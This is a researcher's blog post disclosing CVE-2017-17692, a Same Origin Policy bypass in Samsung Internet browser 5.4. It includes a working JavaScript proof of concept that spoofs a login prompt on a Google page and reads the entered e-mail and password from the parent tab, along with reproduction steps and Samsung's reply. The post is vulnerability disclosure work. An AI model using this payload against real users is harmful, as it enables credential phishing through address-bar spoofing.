Pageviews

Samsung Internet Browser SOP Bypass - CVE-2017-17692

Hi Internet,

Product : Samsung S7 Edge
Product Affected : Samsung Internet browser 5.4.02.3 stable version.

I am using the above product and the updated version for the browser however below are the following steps where SOP bypass can take place.

Snip Code: (Spoof.html)
<script>
function go(){
var x=window.open('https://www.google.com/csi');
setTimeout(function(){x.document.body.innerHTML='<h1>Please login</h1>';a=x.prompt('E-mail','');b=x.prompt('Password','');alert('E-mail: '+a+'\nPassword: '+b)},3000);
}
</script>
<button onclick="go()">go</button>


Steps :
1. Open spoof.html
2. Press Go
3. The page redirects to http://google.com/csi
4. Which give a fake pop up to user by saying enter UserName and Password (Address Bar Spoofing)
5. Once submitted the username and password is shared back to the parent tab which is sign of SOP bypass.

Samsung replied:
Dear Dhiraj,

We would like to thank you for sharing a potential security issue for Samsung mobile device.
We looked into the issue and found that the issue was already patched.

The patch is already preloaded in our upcoming model Galaxy Note8, and the application will be updated via Apps store update in October.

Thank you very much in advance for your cooperation.

Very Respectfully,
Samsung Mobile Security

Development of Metasploit Module:
As the above exploit code impacts most of the OLD Android Stock Browsers, I taught of developing an MSF module for the same, and informed MITRE to assign CVE. Where i got CVE-2017-17692 assigned to this issue from MITRE.

Here is the,
Source Code for Bypassing Same Origin Policy in Samsung Internet Browser in Metasploit

I would like to thank Tod Beardsley and Jeffrey Martin from Rapid7 team for making this possible.

Happy #HaXmas! Tod Beardsley kicks off our twelve-day series with a story of how we worked with me to develop and land an SOP bypass module this fall. The true meaning of Metasploit:
https://blog.rapid7.com/2017/12/25/haxmas-the-true-meaning-s-of-metasploit/ 



Regards
Dhiraj

No comments:

Post a Comment